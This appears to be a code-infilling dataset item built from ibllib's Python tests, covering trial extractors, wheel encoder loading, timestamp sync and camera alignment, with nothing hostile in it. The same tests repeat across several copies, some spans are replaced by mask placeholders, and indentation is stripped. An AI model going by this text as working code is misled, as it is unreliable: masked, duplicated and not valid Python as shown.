for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
def test_load_encoder_positions(self):
raw.load_encoder_positions(self.training_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.training_ge5['path'])
raw.load_encoder_positions(self.biased_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.biased_ge5['path'])
<mask token>
<mask token>
<mask token>
class TestSyncWheelBpod(unittest.TestCase):
def test_sync_bpod_bonsai_poor_quality_timestamps(self):
sync_trials_robust = raw.sync_trials_robust
drift_pol = np.array([11 * 1e-06, -20])
np.random.seed(seed=784)
t0_full = np.cumsum(np.random.rand(50)) + 0.001
t1_full = np.polyval(drift_pol, t0_full) + t0_full
t0 = t0_full.copy()
t1 = t1_full.copy()
t0_, t1_ = sync_trials_robust(t0, t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[:-1])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[1:])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[1:], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[:-1], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
class TestWheelLoaders(unittest.TestCase):
def setUp(self) ->None:
self.main_path = Path(__file__).parent
def test_encoder_events_corrupt(self):
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_lt5(file_events)
self.assertTrue(dy.size > 6)
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_ge5(file_events)
self.assertTrue(dy.size > 6)
def test_encoder_positions_corrupts(self):
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_ge5(file_position)
self.assertTrue(dy.size > 18)
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_lt5(file_position)
self.assertTrue(dy.size > 18)
class MockExtracor(BaseExtractor):
save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',
'some_file.npy')
var_names = 'csv', 'ssv', 'tsv', 'npy'
def _extract(self, **kwargs) ->tuple:
csv = pd.DataFrame([1, 2, 3])
ssv = pd.DataFrame([1, 2, 3])
tsv = pd.DataFrame([1, 2, 3])
npy = np.array([1, 2, 3])
return csv, ssv, tsv, npy
class TestBaseExtractorSavingMethods(unittest.TestCase):
def setUp(self) ->None:
self.tempdir = tempfile.TemporaryDirectory()
self.session_path = self.tempdir.name
self.mock_extractor = MockExtracor(self.session_path)
def test_saving_method(self):
data, paths = self.mock_extractor.extract(save=True)
self.assertTrue(all([x.exists() for x in paths]))
def tearDown(self):
self.tempdir.cleanup()
class TestCameraExtractors(unittest.TestCase):
def test_groom_pin_state(self):
fps = 60
t_offset = 39.4
ts = np.arange(0, 10, 1 / fps) + t_offset
ts += np.full_like(ts, 0.0001).cumsum()
n_pulses = 2
pulse_width = 0.3
duty = 0.5
gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
gpio['polarities'][1::2] = -1
aud_offset = 40.0
audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[
'polarities']}
for p in range(n_pulses):
i = p * 2
rise = pulse_width * p + duty * p + 1
audio['times'][i] = aud_offset + rise
audio['times'][i + 1] = audio['times'][i] + pulse_width
rise += t_offset
gpio['indices'][i] = np.where(ts > rise)[0][0]
gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]
gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
self.assertEqual(audio, audio_, "Audio dict shouldn't be effected")
np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667,
40.033333, 40.05])
delay = 0.08
pulse_width = 1e-05
t = audio['times'][0] + delay
audio['times'] = np.sort(np.append(audio['times'], [t, t +
pulse_width, 80]))
audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
audio['polarities'][1::2] = -1
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff
=0.005)
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)
audio['times'][4] -= 0.3
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,
tolerance=0.1, min_diff=0.005)
self.assertTrue(np.all(gpio_['times'] == audio_['times']))
self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))
def test_attribute_times(self, display=False):
tsa = np.linspace(0, 60, 60 * 4)[:60]
tsb = np.linspace(0, 60, 60 * 3)[:45]
tsa = np.sort(np.append(tsa, 0.4))
tsb = np.sort(np.append(tsb, 0.41))
if display:
from ibllib.plots import vertical_lines
import matplotlib.pyplot as plt
vertical_lines(tsb, linestyle=':', color='r', label='tsb')
vertical_lines(tsa, linestyle=':', color='b', label='tsa')
plt.legend()
matches = camera.attribute_times(tsa, tsb)
expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
self.assertEqual(matches.size, tsb.size)
matches = camera.attribute_times(tsa, tsb, take='nearest')
expected[np.r_[1:3]] = expected[1:3] + 1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, take='after')
missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23,
25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
expected[missing] = -1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, tol=0.05)
expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,
49, 53, 57])
np.testing.assert_array_equal(matches[matches > -1], expected)
matches = camera.attribute_times(tsa, tsb, injective=False, take=
'nearest')
expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
with self.assertRaises(ValueError):
camera.attribute_times(tsa, tsb, injective=False, take='closest')
<mask token>
| <mask token>
class TestExtractTrialData(unittest.TestCase):
def setUp(self):
self.main_path = Path(__file__).parent
self.training_lt5 = {'path': self.main_path / 'data' /
'session_training_lt5'}
self.biased_lt5 = {'path': self.main_path / 'data' /
'session_biased_lt5'}
self.training_ge5 = {'path': self.main_path / 'data' /
'session_training_ge5'}
self.biased_ge5 = {'path': self.main_path / 'data' /
'session_biased_ge5'}
self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[
'path']))
self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])
)
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[
'path']))
self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])
)
self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'
self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'
def test_get_feedbackType(self):
ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[
0]
self.assertEqual(ft.size, self.training_lt5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[
0]
self.assertEqual(ft.size, self.training_ge5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_lt5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_ge5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
def test_get_contrastLR(self):
cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
<mask token>
def test_get_choice(self):
choice = training_trials.Choice(session_path=self.training_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = training_trials.Choice(session_path=self.training_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
def test_get_repNum(self):
rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(3):
self.assertTrue(i in rn)
rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(4):
self.assertTrue(i in rn)
def test_get_rewardVolume(self):
rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
def test_get_feedback_times_ge5(self):
ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_feedback_times_lt5(self):
ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_stimOnTrigger_times(self):
sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
<mask token>
def test_get_stimOn_times_ge5(self):
st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
<mask token>
def test_get_intervals(self):
di = training_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = training_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
def test_get_response_times(self):
rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
def test_get_goCueTrigger_times(self):
data = raw.load_data(self.training_lt5['path'])
gct = np.array([tr['behavior_data']['States timestamps'][
'closed_loop'][0][0] for tr in data])
self.assertTrue(isinstance(gct, np.ndarray))
gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(gct, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
gct = np.array([tr['behavior_data']['States timestamps'][
'closed_loop'][0][0] for tr in data])
self.assertTrue(isinstance(gct, np.ndarray))
gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(gct, np.ndarray))
def test_get_goCueOnset_times(self):
gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertTrue(np.all(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 12)
gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 8)
def test_get_included_trials_lt5(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials_ge5(self):
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
@wheelMoves_fixture
def test_extract_all(self):
with self.assertRaises(ValueError) as ex:
training_trials.extract_all(self.training_lt5['path'], settings
={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',
str(ex.exception))
out, files = training_trials.extract_all(self.training_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'
) as Wheel:
Wheel.var_names = tuple()
Wheel().extract.return_value = {}, []
out, files = biased_trials.extract_all(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertEqual(15, len(out))
self.assertTrue(all(map(Path.exists, files)))
out, files = biased_trials.extract_all(self.biased_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
def test_encoder_positions_clock_reset(self):
path = self.training_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,
1853979, 1859144])
self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))
def test_encoder_positions_clock_errors(self):
path = self.biased_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
path = self.biased_ge5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_ge5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
def test_wheel_folders(self):
for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
def test_load_encoder_positions(self):
raw.load_encoder_positions(self.training_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.training_ge5['path'])
raw.load_encoder_positions(self.biased_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.biased_ge5['path'])
def test_load_encoder_events(self):
raw.load_encoder_events(self.training_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_events(self.training_ge5['path'])
raw.load_encoder_events(self.biased_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_events(self.biased_ge5['path'])
<mask token>
<mask token>
class TestSyncWheelBpod(unittest.TestCase):
def test_sync_bpod_bonsai_poor_quality_timestamps(self):
sync_trials_robust = raw.sync_trials_robust
drift_pol = np.array([11 * 1e-06, -20])
np.random.seed(seed=784)
t0_full = np.cumsum(np.random.rand(50)) + 0.001
t1_full = np.polyval(drift_pol, t0_full) + t0_full
t0 = t0_full.copy()
t1 = t1_full.copy()
t0_, t1_ = sync_trials_robust(t0, t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[:-1])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[1:])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[1:], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[:-1], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
class TestWheelLoaders(unittest.TestCase):
def setUp(self) ->None:
self.main_path = Path(__file__).parent
def test_encoder_events_corrupt(self):
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_lt5(file_events)
self.assertTrue(dy.size > 6)
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_ge5(file_events)
self.assertTrue(dy.size > 6)
def test_encoder_positions_corrupts(self):
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_ge5(file_position)
self.assertTrue(dy.size > 18)
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_lt5(file_position)
self.assertTrue(dy.size > 18)
class MockExtracor(BaseExtractor):
save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',
'some_file.npy')
var_names = 'csv', 'ssv', 'tsv', 'npy'
def _extract(self, **kwargs) ->tuple:
csv = pd.DataFrame([1, 2, 3])
ssv = pd.DataFrame([1, 2, 3])
tsv = pd.DataFrame([1, 2, 3])
npy = np.array([1, 2, 3])
return csv, ssv, tsv, npy
class TestBaseExtractorSavingMethods(unittest.TestCase):
def setUp(self) ->None:
self.tempdir = tempfile.TemporaryDirectory()
self.session_path = self.tempdir.name
self.mock_extractor = MockExtracor(self.session_path)
def test_saving_method(self):
data, paths = self.mock_extractor.extract(save=True)
self.assertTrue(all([x.exists() for x in paths]))
def tearDown(self):
self.tempdir.cleanup()
class TestCameraExtractors(unittest.TestCase):
def test_groom_pin_state(self):
fps = 60
t_offset = 39.4
ts = np.arange(0, 10, 1 / fps) + t_offset
ts += np.full_like(ts, 0.0001).cumsum()
n_pulses = 2
pulse_width = 0.3
duty = 0.5
gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
gpio['polarities'][1::2] = -1
aud_offset = 40.0
audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[
'polarities']}
for p in range(n_pulses):
i = p * 2
rise = pulse_width * p + duty * p + 1
audio['times'][i] = aud_offset + rise
audio['times'][i + 1] = audio['times'][i] + pulse_width
rise += t_offset
gpio['indices'][i] = np.where(ts > rise)[0][0]
gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]
gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
self.assertEqual(audio, audio_, "Audio dict shouldn't be effected")
np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667,
40.033333, 40.05])
delay = 0.08
pulse_width = 1e-05
t = audio['times'][0] + delay
audio['times'] = np.sort(np.append(audio['times'], [t, t +
pulse_width, 80]))
audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
audio['polarities'][1::2] = -1
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff
=0.005)
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)
audio['times'][4] -= 0.3
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,
tolerance=0.1, min_diff=0.005)
self.assertTrue(np.all(gpio_['times'] == audio_['times']))
self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))
def test_attribute_times(self, display=False):
tsa = np.linspace(0, 60, 60 * 4)[:60]
tsb = np.linspace(0, 60, 60 * 3)[:45]
tsa = np.sort(np.append(tsa, 0.4))
tsb = np.sort(np.append(tsb, 0.41))
if display:
from ibllib.plots import vertical_lines
import matplotlib.pyplot as plt
vertical_lines(tsb, linestyle=':', color='r', label='tsb')
vertical_lines(tsa, linestyle=':', color='b', label='tsa')
plt.legend()
matches = camera.attribute_times(tsa, tsb)
expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
self.assertEqual(matches.size, tsb.size)
matches = camera.attribute_times(tsa, tsb, take='nearest')
expected[np.r_[1:3]] = expected[1:3] + 1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, take='after')
missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23,
25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
expected[missing] = -1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, tol=0.05)
expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,
49, 53, 57])
np.testing.assert_array_equal(matches[matches > -1], expected)
matches = camera.attribute_times(tsa, tsb, injective=False, take=
'nearest')
expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
with self.assertRaises(ValueError):
camera.attribute_times(tsa, tsb, injective=False, take='closest')
<mask token>
| <mask token>
class TestExtractTrialData(unittest.TestCase):
def setUp(self):
self.main_path = Path(__file__).parent
self.training_lt5 = {'path': self.main_path / 'data' /
'session_training_lt5'}
self.biased_lt5 = {'path': self.main_path / 'data' /
'session_biased_lt5'}
self.training_ge5 = {'path': self.main_path / 'data' /
'session_training_ge5'}
self.biased_ge5 = {'path': self.main_path / 'data' /
'session_biased_ge5'}
self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[
'path']))
self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])
)
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[
'path']))
self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])
)
self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'
self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'
def test_get_feedbackType(self):
ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[
0]
self.assertEqual(ft.size, self.training_lt5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[
0]
self.assertEqual(ft.size, self.training_ge5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]
